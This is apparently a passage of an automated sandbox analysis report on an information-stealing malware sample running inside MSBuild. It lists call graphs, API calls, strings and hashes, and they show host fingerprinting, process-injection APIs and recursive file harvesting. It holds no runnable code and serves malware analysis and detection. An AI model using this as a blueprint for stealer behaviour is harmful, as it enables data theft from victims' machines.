4104e7 lstrcpyA 84257->84258 84259 413b9f 84258->84259 84260 410609 3 API calls 84259->84260 84261 413baf 84260->84261 84262 41058d lstrcpyA 84261->84262 84263 413bb7 84262->84263 84264 410609 3 API calls 84263->84264 84265 413bcf 84264->84265 84266 41058d lstrcpyA 84265->84266 84267 413bd7 84266->84267 84268 410609 3 API calls 84267->84268 84269 413bef 84268->84269 84270 41058d lstrcpyA 84269->84270 84271 413bf7 84270->84271 84272 410609 3 API calls 84271->84272 84273 413c0f 84272->84273 84274 41058d lstrcpyA 84273->84274 84275 413c17 84274->84275 84276 410609 3 API calls 84275->84276 84277 413c2f 84276->84277 84278 41058d lstrcpyA 84277->84278 84279 413c37 84278->84279 85156 410cc0 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 84279->85156 84282 410609 3 API calls 84283 413c50 84282->84283 84284 41058d lstrcpyA 84283->84284 84285 413c58 84284->84285 84286 410609 3 API calls 84285->84286 84287 413c70 84286->84287 84288 41058d lstrcpyA 84287->84288 84289 413c78 84288->84289 84290 410609 3 API calls 84289->84290 84291 413c90 84290->84291 84292 41058d lstrcpyA 84291->84292 84293 413c98 84292->84293 85159 4115d4 84293->85159 84296 410609 3 API calls 84297 413cb1 84296->84297 84298 41058d lstrcpyA 84297->84298 84299 413cb9 84298->84299 84300 410609 3 API calls 84299->84300 84301 413cd1 84300->84301 84302 41058d lstrcpyA 84301->84302 84303 413cd9 84302->84303 84304 410609 3 API calls 84303->84304 84305 413cf1 84304->84305 84306 41058d lstrcpyA 84305->84306 84307 413cf9 84306->84307 84308 411684 11 API calls 84307->84308 84309 413d09 84308->84309 84310 4105c7 2 API calls 84309->84310 84311 413d16 84310->84311 84312 41058d lstrcpyA 84311->84312 84313 413d1e 84312->84313 84314 410609 3 API calls 84313->84314 84315 413d3e 84314->84315 84316 41058d lstrcpyA 84315->84316 84317 413d46 84316->84317 84318 410609 3 API calls 84317->84318 84319 413d5e 84318->84319 84320 41058d lstrcpyA 84319->84320 84321 413d66 84320->84321 84322 4109a2 19 API calls 84321->84322 84323 413d76 84322->84323 84324 4105c7 2 API calls 84323->84324 84325 413d83 84324->84325 84326 41058d lstrcpyA 84325->84326 84327 413d8b 84326->84327 84328 410609 3 API calls 84327->84328 84329 413dab 84328->84329 84330 41058d lstrcpyA 84329->84330 84331 413db3 84330->84331 84332 410609 3 API calls 84331->84332 84333 413dcb 84332->84333 84334 41058d lstrcpyA 84333->84334 84335 413dd3 84334->84335 84336 413ddb GetCurrentProcessId 84335->84336 85166 41224a OpenProcess 84336->85166 84339 4105c7 2 API calls 84340 413df8 84339->84340 84341 41058d lstrcpyA 84340->84341 84342 413e00 84341->84342 84343 410609 3 API calls 84342->84343 84344 413e20 84343->84344 84345 41058d lstrcpyA 84344->84345 84346 413e28 84345->84346 84347 410609 3 API calls 84346->84347 84348 413e40 84347->84348 84349 41058d lstrcpyA 84348->84349 84350 413e48 84349->84350 84351 410609 3 API calls 84350->84351 84352 413e60 84351->84352 84353 41058d lstrcpyA 84352->84353 84354 413e68 84353->84354 84355 410609 3 API calls 84354->84355 84356 413e80 84355->84356 84357 41058d lstrcpyA 84356->84357 84358 413e88 84357->84358 85173 410b30 GetProcessHeap HeapAlloc 84358->85173 84361 410609 3 API calls 84362 413ea1 84361->84362 84363 41058d lstrcpyA 84362->84363 84364 413ea9 84363->84364 84365 410609 3 API calls 84364->84365 84366 413ec1 84365->84366 84367 41058d lstrcpyA 84366->84367 84368 413ec9 84367->84368 84369 410609 3 API calls 84368->84369 84370 413ee1 84369->84370 84371 41058d lstrcpyA 84370->84371 84372 413ee9 84371->84372 85180 411807 84372->85180 84375 4105c7 2 API calls 84376 413f06 84375->84376 84377 41058d lstrcpyA 84376->84377 84378 413f0e 84377->84378 84379 410609 3 API calls 84378->84379 84380 413f2e 84379->84380 84381 41058d lstrcpyA 84380->84381 84382 413f36 84381->84382 84383 410609 3 API calls 84382->84383 84384 413f4e 84383->84384 84385 41058d lstrcpyA 84384->84385 84386 413f56 84385->84386 85197 411997 84386->85197 84388 413f67 84389 4105c7 2 API calls 84388->84389 84390 413f75 84389->84390 84391 41058d lstrcpyA 84390->84391 84392 413f7d 84391->84392 84393 410609 3 API calls 84392->84393 84394 413f9d 84393->84394 84395 41058d lstrcpyA 84394->84395 84396 413fa5 84395->84396 84397 410609 3 API calls 84396->84397 84398 413fbd 84397->84398 84399 41058d lstrcpyA 84398->84399 84400 413fc5 84399->84400 84401 410c85 3 API calls 84400->84401 84402 413fd2 84401->84402 84403 410609 3 API calls 84402->84403 84404 413fde 84403->84404 84405 41058d lstrcpyA 84404->84405 84406 413fe6 84405->84406 84407 410609 3 API calls 84406->84407 84408 413ffe 84407->84408 84409 41058d lstrcpyA 84408->84409 84410 414006 84409->84410 84411 410609 3 API calls 84410->84411 84412 41401e 84411->84412 84413 41058d lstrcpyA 84412->84413 84414 414026 84413->84414 85212 410c53 GetProcessHeap RtlAllocateHeap GetUserNameA 84414->85212 84416 414033 84417 410609 3 API calls 84416->84417 84418 41403f 84417->84418 84419 41058d lstrcpyA 84418->84419 84420 414047 84419->84420 84421 410609 3 API calls 84420->84421 84422 41405f 84421->84422 84423 41058d lstrcpyA 84422->84423 84424 414067 84423->84424 84425 410609 3 API calls 84424->84425 84426 41407f 84425->84426 84427 41058d lstrcpyA 84426->84427 84428 414087 84427->84428 85213 411563 7 API calls 84428->85213 84431 4105c7 2 API calls 84432 4140a6 84431->84432 84433 41058d lstrcpyA 84432->84433 84434 4140ae 84433->84434 84435 410609 3 API calls 84434->84435 84436 4140ce 84435->84436 84437 41058d lstrcpyA 84436->84437 84438 4140d6 84437->84438 84439 410609 3 API calls 84438->84439 84440 4140ee 84439->84440 84441 41058d lstrcpyA 84440->84441 84442 4140f6 84441->84442 85216 410ddb 84442->85216 84445 4105c7 2 API calls 84446 414113 84445->84446 84447 41058d lstrcpyA 84446->84447 84448 41411b 84447->84448 84449 410609 3 API calls 84448->84449 84450 41413b 84449->84450 84451 41058d lstrcpyA 84450->84451 84452 414143 84451->84452 84453 410609 3 API calls 84452->84453 84454 41415b 84453->84454 84455 41058d lstrcpyA 84454->84455 84456 414163 84455->84456 84457 410cc0 9 API calls 84456->84457 84458 414170 84457->84458 84459 410609 3 API calls 84458->84459 84460 41417c 84459->84460 84461 41058d lstrcpyA 84460->84461 84462 414184 84461->84462 84463 410609 3 API calls 84462->84463 84464 41419c 84463->84464 84465 41058d lstrcpyA 84464->84465 84466 4141a4 84465->84466 84467 410609 3 API calls 84466->84467 84468 4141bc 84467->84468 84469 41058d lstrcpyA 84468->84469 84470 4141c4 84469->84470 85228 410d2e GetProcessHeap HeapAlloc GetTimeZoneInformation 84470->85228 84473 410609 3 API calls 84474 4141dd 84473->84474 84475 41058d lstrcpyA 84474->84475 84476 4141e5 84475->84476 84477 410609 3 API calls 84476->84477 84478 4141fd 84477->84478 84479 41058d lstrcpyA 84478->84479 84480 414205 84479->84480 84481 410609 3 API calls 84480->84481 84482 41421d 84481->84482 84483 41058d lstrcpyA 84482->84483 84484 414225 84483->84484 84485 410609 3 API calls 84484->84485 84486 41423d 84485->84486 84487 41058d lstrcpyA 84486->84487 84488 414245 84487->84488 85233 410f51 GetProcessHeap HeapAlloc RegOpenKeyExA 84488->85233 84490 414252 84491 410609 3 API calls 84490->84491 84492 41425e 84491->84492 84493 41058d lstrcpyA 84492->84493 84494 414266 84493->84494 84495 410609 3 API calls 84494->84495 84496 41427e 84495->84496 84497 41058d lstrcpyA 84496->84497 84498 414286 84497->84498 84499 410609 3 API calls 84498->84499 84500 41429e 84499->84500 84501 41058d lstrcpyA 84500->84501 84502 4142a6 84501->84502 85236 411007 84502->85236 84505 410609 3 API calls 84506 4142bf 84505->84506 84507 41058d lstrcpyA 84506->84507 84508 4142c7 84507->84508 84509 410609 3 API calls 84508->84509 84510 4142df 84509->84510 84511 41058d lstrcpyA 84510->84511 84512 4142e7 84511->84512 84513 410609 3 API calls 84512->84513 84514 4142ff 84513->84514 84515 41058d lstrcpyA 84514->84515 84516 414307 84515->84516 85253 410fba GetSystemInfo wsprintfA 84516->85253 84519 410609 3 API calls 84520 414320 84519->84520 84521 41058d lstrcpyA 84520->84521 84522 414328 84521->84522 84523 410609 3 API calls 84522->84523 84524 414340 84523->84524 84525 41058d lstrcpyA 84524->84525 84526 414348 84525->84526 84527 410609 3 API calls 84526->84527 84528 414360 84527->84528 84529 41058d lstrcpyA 84528->84529 84530 414368 84529->84530 85256 411119 GetProcessHeap HeapAlloc 84530->85256 84533 410609 3 API calls 84534 414381 84533->84534 84535 41058d lstrcpyA 84534->84535 84536 414389 84535->84536 84537 410609 3 API calls 84536->84537 84538 4143a4 84537->84538 84539 41058d lstrcpyA 84538->84539 84540 4143ac 84539->84540 84541 410609 3 API calls 84540->84541 84542 4143c7 84541->84542 84543 41058d lstrcpyA 84542->84543 84544 4143cf 84543->84544 85263 411192 84544->85263 84547 4105c7 2 API calls 84548 4143ef 84547->84548 84549 41058d lstrcpyA 84548->84549 84550 4143f7 84549->84550 84551 410609 3 API calls 84550->84551 84552 41441a 84551->84552 84553 41058d lstrcpyA 84552->84553 84554 414422 84553->84554 84555 410609 3 API calls 84554->84555 84556 41443a 84555->84556 84557 41058d lstrcpyA 84556->84557 84558 414442 84557->84558 85271 4114a5 84558->85271 84561 4105c7 2 API calls 84562 414462 84561->84562 84563 41058d lstrcpyA 84562->84563 84564 41446a 84563->84564 84565 410609 3 API calls 84564->84565 84566 414490 84565->84566 84567 41058d lstrcpyA 84566->84567 84568 414498 84567->84568 84569 410609 3 API calls 84568->84569 84570 4144b3 84569->84570 84571 41058d lstrcpyA 84570->84571 84572 4144bb 84571->84572 85281 411203 84572->85281 84575 4105c7 2 API calls 84576 4144e0 84575->84576 84577 41058d lstrcpyA 84576->84577 84578 4144e8 84577->84578 84579 411203 21 API calls 84578->84579 84580 414509 84579->84580 84581 4105c7 2 API calls 84580->84581 84582 414518 84581->84582 84583 41058d lstrcpyA 84582->84583 84584 414520 84583->84584 84585 410609 3 API calls 84584->84585 84586 414543 84585->84586 84587 41058d lstrcpyA 84586->84587 84588 41454b 84587->84588 84589 401cfd lstrcpyA 84588->84589 84590 414560 lstrlenA 84589->84590 84591 4104e7 lstrcpyA 84590->84591 84592 41457d 84591->84592 85301 416e97 84592->85301 85102->83786 85104 41d016 _CountryEnumProc@4 5 API calls 85103->85104 85105 412601 85104->85105 85105->83009 85105->83011 85107 4104e7 lstrcpyA 85106->85107 85108 402a05 85107->85108 85108->83871 85110 4104e7 lstrcpyA 85109->85110 85111 402a16 85110->85111 85111->83871 85113 4104e7 lstrcpyA 85112->85113 85114 402a27 85113->85114 85114->83871 85116 410519 lstrcpyA 85115->85116 85117 416dac 85116->85117 85118 410519 lstrcpyA 85117->85118 85119 416db7 85118->85119 85120 410519 lstrcpyA 85119->85120 85121 416dc2 85120->85121 85121->83888 85122->83871 85123->83871 85124->83871 85126 4116ad 85125->85126 85127 41173c 85125->85127 85129 4104e7 lstrcpyA 85126->85129 85128 4104e7 lstrcpyA 85127->85128 85131 411748 85128->85131 85130 4116c0 _memset 85129->85130 85142 4123d5 lstrcpyA malloc strncpy 85130->85142 85132 41d016 _CountryEnumProc@4 5 API calls 85131->85132 85133 411755 85132->85133 85133->83910 85135 4116ea lstrcatA 85143 402920 85135->85143 85137 411707 lstrcatA 85138 411724 85137->85138 85139 4104e7 lstrcpyA 85138->85139 85140 411732 85139->85140 85140->85131 85141->83913 85142->85135 85144 402924 85143->85144 85144->85137 85146 404ac4 85145->85146 85146->85146 85147 404acb ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI lstrlenA InternetCrackUrlA 85146->85147 85148 404b27 85147->85148 85148->83922 85150 40663e lstrlenA lstrlenA 85149->85150 85150->84228 85152 40806a LocalAlloc 85151->85152 85153 406724 85151->85153 85152->85153 85154 40807a CryptStringToBinaryA 85152->85154 85153->84091 85153->84102 85154->85153 85155 408091 LocalFree 85154->85155 85155->85153 85157 41d016 _CountryEnumProc@4 5 API calls 85156->85157 85158 410d2c 85157->85158 85158->84282 85318 423c10 85159->85318 85162 411651 RegCloseKey CharToOemA 85164 41d016 _CountryEnumProc@4 5 API calls 85162->85164 85163 411630 RegQueryValueExA 85163->85162 85165 411682 85164->85165 85165->84296 85167 412294 85166->85167 85168 412278 K32GetModuleFileNameExA CloseHandle 85166->85168 85169 4104e7 lstrcpyA 85167->85169 85168->85167 85170 4122a0 85169->85170 85171 41d016 _CountryEnumProc@4 5 API calls 85170->85171 85172 4122ae 85171->85172 85172->84339 85320 410c16 85173->85320 85176 410b63 RegOpenKeyExA 85178 410b83 RegQueryValueExA 85176->85178 85179 410b9b RegCloseKey 85176->85179 85177 410b5c 85177->84361 85178->85179 85179->85177 85327 42f109 85180->85327 85182 411813 CoInitializeEx CoInitializeSecurity CoCreateInstance 85183 41186b 85182->85183 85184 411873 CoSetProxyBlanket 85183->85184 85187 411964 85183->85187 85190 4118a3 85184->85190 85185 4104e7 lstrcpyA 85186 41198f 85185->85186 85188 42f165 5 API calls 85186->85188 85187->85185 85189 411996 85188->85189 85189->84375 85190->85187 85191 4118d7 VariantInit 85190->85191 85192 4118f6 85191->85192 85328 411757 85192->85328 85194 411901 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 85195 4104e7 lstrcpyA 85194->85195 85196 411958 VariantClear 85195->85196 85196->85186 85337 42f09d 85197->85337 85199 4119a3 CoInitializeEx CoInitializeSecurity CoCreateInstance 85200 4119f9 85199->85200 85201 411a01 CoSetProxyBlanket 85200->85201 85202 411a93 85200->85202 85205 411a31 85201->85205 85203 4104e7 lstrcpyA 85202->85203 85204 411abe 85203->85204 85204->84388 85205->85202 85206 411a59 VariantInit 85205->85206 85207 411a78 85206->85207 85338 411d42 LocalAlloc CharToOemW 85207->85338 85209 411a80 85210 4104e7 lstrcpyA 85209->85210 85211 411a87 VariantClear 85210->85211 85211->85204 85212->84416 85214 4104e7 lstrcpyA 85213->85214 85215 4115cd 85214->85215 85215->84431 85217 4104e7 lstrcpyA 85216->85217 85218 410e02 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 85217->85218 85219 410eed 85218->85219 85227 410e3c 85218->85227 85221 410f05 85219->85221 85222 410ef9 LocalFree 85219->85222 85220 410e42 GetLocaleInfoA 85220->85227 85223 41d016 _CountryEnumProc@4 5 API calls 85221->85223 85222->85221 85225 410f15 85223->85225 85224 410609 lstrlenA lstrcpyA lstrcatA 85224->85227 85225->84445 85226 41058d lstrcpyA 85226->85227 85227->85219 85227->85220 85227->85224 85227->85226 85229 410d86 85228->85229 85230 410d6a wsprintfA 85228->85230 85231 41d016 _CountryEnumProc@4 5 API calls 85229->85231 85230->85229 85232 410d93 85231->85232 85232->84473 85234 410f94 RegQueryValueExA 85233->85234 85235 410fac RegCloseKey 85233->85235 85234->85235 85235->84490 85237 41107c GetLogicalProcessorInformationEx 85236->85237 85238 411087 85237->85238 85239 411048 GetLastError 85237->85239 85341 411b5b GetProcessHeap HeapFree 85238->85341 85240 4110f3 85239->85240 85241 411057 85239->85241 85243 4110fd 85240->85243 85342 411b5b GetProcessHeap HeapFree 85240->85342 85250 41105b 85241->85250 85248 41d016 _CountryEnumProc@4 5 API calls 85243->85248 85246 4110c0 85246->85243 85249 4110c9 wsprintfA 85246->85249 85252 411117 85248->85252 85249->85243 85250->85237 85251 4110ec 85250->85251 85339 411b5b GetProcessHeap HeapFree 85250->85339 85340 411b78 GetProcessHeap HeapAlloc 85250->85340 85251->85243 85252->84505 85254 41d016 _CountryEnumProc@4 5 API calls 85253->85254 85255 411005 85254->85255 85255->84519 85343 411b26 85256->85343 85259 41115f wsprintfA 85261 41d016 _CountryEnumProc@4 5 API calls 85259->85261 85262 411190 85261->85262 85262->84533 85264 4104e7 lstrcpyA 85263->85264 85265 4111b3 85264->85265 85266 4111df EnumDisplayDevicesA 85265->85266 85267 4111f3 85265->85267 85268 410549 2 API calls 85265->85268 85266->85265 85266->85267 85269 41d016 _CountryEnumProc@4 5 API calls 85267->85269 85268->85265 85270 411201 85269->85270 85270->84547 85272 4104e7 lstrcpyA 85271->85272 85273 4114c6 CreateToolhelp32Snapshot Process32First 85272->85273 85274 41154c CloseHandle 85273->85274 85280 4114ee 85273->85280 85275 41d016 _CountryEnumProc@4 5 API calls 85274->85275 85277 411561 85275->85277 85276 41153a Process32Next 85276->85274 85276->85280 85277->84561 85278 410609 lstrlenA lstrcpyA lstrcatA 85278->85280 85279 41058d lstrcpyA 85279->85280 85280->85276 85280->85278 85280->85279 85282 4104e7 lstrcpyA 85281->85282 85283 41123b RegOpenKeyExA 85282->85283 85284 411478 85283->85284 85300 411281 85283->85300 85286 410519 lstrcpyA 85284->85286 85285 411287 RegEnumKeyExA 85287 4112c4 wsprintfA RegOpenKeyExA 85285->85287 85285->85300 85288 411489 85286->85288 85290 411460 RegCloseKey 85287->85290 85291 41130a RegQueryValueExA 85287->85291 85295 41d016 _CountryEnumProc@4 5 API calls 85288->85295 85289 41145e 85292 41146c RegCloseKey 85289->85292 85290->85292 85293 411440 RegCloseKey 85291->85293 85294 411340 lstrlenA 85291->85294 85292->85284 85293->85300 85294->85293 85294->85300 85296 4114a3 85295->85296 85296->84575 85297 41058d lstrcpyA 85297->85300 85298 4113b0 RegQueryValueExA 85298->85293 85298->85300 85299 410609 lstrlenA lstrcpyA lstrcatA 85299->85300 85300->85285 85300->85289 85300->85293 85300->85297 85300->85298 85300->85299 85302 416ea7 85301->85302 85303 41058d lstrcpyA 85302->85303 85304 416ec4 85303->85304 85305 41058d lstrcpyA 85304->85305 85319 41160c RegOpenKeyExA 85318->85319 85319->85162 85319->85163 85323 410ba9 GetProcessHeap HeapAlloc RegOpenKeyExA 85320->85323 85322 410b58 85322->85176 85322->85177 85324 410c03 RegCloseKey 85323->85324 85325 410bec RegQueryValueExA 85323->85325 85326 410c13 85324->85326 85325->85324 85326->85322 85327->85182 85336 42f09d 85328->85336 85330 411763 CoCreateInstance 85331 41178b SysAllocString 85330->85331 85332 4117e7 85330->85332 85331->85332 85334 41179a 85331->85334 85332->85194 85333 4117e0 SysFreeString 85333->85332 85334->85333 85335 4117be _wtoi64 SysFreeString 85334->85335 85335->85333 85336->85330 85337->85199 85338->85209 85339->85250 85340->85250 85341->85246 85342->85243 85344 41114d GlobalMemoryStatusEx 85343->85344 85344->85259

                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                      Function 00418950 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                      • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                                                                                                                                      • API String ID: 2238633743-2740034357
                                                                                                                                                                                                                      • Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                                                                                                                                                                      • Instruction ID: 8261b1413bc3cc4e1081ef522fb3a36784379b70ccc82e73ae8bdeed84e113b8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7352F475910312AFEF1ADFA0FD188243BA7F718707F11A466E91582270E73B4A64EF19
                                                                                                                                                                                                                      Function 00414CC8 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 297filestringCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 1168 414cc8-414d6f call 42e390 wsprintfA FindFirstFileA call 423c10 * 2 1175 414d75-414d89 StrCmpCA 1168->1175 1176 41512b-415141 call 401cde call 41d016 1168->1176 1177 4150f8-41510d FindNextFileA 1175->1177 1178 414d8f-414da3 StrCmpCA 1175->1178 1180 41511f-415125 FindClose 1177->1180 1181 41510f-415111 1177->1181 1178->1177 1182 414da9-414deb wsprintfA StrCmpCA 1178->1182 1180->1176 1181->1175 1184 414e0a-414e1c wsprintfA 1182->1184 1185 414ded-414e08 wsprintfA 1182->1185 1187 414e1f-414e5c call 423c10 lstrcatA 1184->1187 1185->1187 1191 414e82-414e89 strtok_s 1187->1191 1192 414e8b-414ec9 call 423c10 lstrcatA strtok_s 1191->1192 1193 414e5e-414e6f 1191->1193 1198 415089-41508d 1192->1198 1199 414ecf-414edf PathMatchSpecA 1192->1199 1197 414e75-414e81 1193->1197 1193->1198 1197->1191 1198->1177 1202 41508f-415095 1198->1202 1200 414ee5-414fbe call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 DeleteFileA CopyFileA call 412166 call 42efc0 1199->1200 1201 414fd9-414fee strtok_s 1199->1201 1238 414fc0-414fd4 DeleteFileA call 402920 1200->1238 1239 414ff9-415005 1200->1239 1201->1199 1204 414ff4 1201->1204 1202->1180 1205 41509b-4150a9 1202->1205 1204->1198 1205->1177 1207 4150ab-4150ed call 401cfd call 414cc8 1205->1207 1214 4150f2 1207->1214 1214->1177 1238->1201 1241 415116-41511d call 402920 1239->1241 1242 41500b-415031 call 410519 call 407fac 1239->1242 1241->1176 1250 415033-415077 call 401cfd call 4104e7 call 416e97 call 402920 1242->1250 1251 41507d-415084 call 402920 1242->1251 1250->1251 1251->1198
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00414D1C
                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00414D4F
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00414D60
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00414DC2
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00414DFF
                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00414E16
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00414E28
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 00414E82
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00414E94
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00414EA9
                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 00414EC2
                                                                                                                                                                                                                      • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414ED7
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?,00436A28,0043661D), ref: 00414F90
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 00414FA0
                                                                                                                                                                                                                        • Part of subcall function 00412166: CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00414FC1
                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 00414FE7
                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(?,?), ref: 00415105
                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 00415125
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                                                                      • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                                      • API String ID: 956187361-332874205
                                                                                                                                                                                                                      • Opcode ID: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
                                                                                                                                                                                                                      • Instruction ID: 9fc36efd77a6d1cd63b80ec75f09b897df8326cc2b47f4e5761c6ba69d6b93d4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5BC12AB2E0021AABCF21EF61DC45AEE777DAF08305F0144A6F609B3151D7399B858F55
                                                                                                                                                                                                                      Function 00409D1C Relevance: 44.4, APIs: 20, Strings: 5, Instructions: 610fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
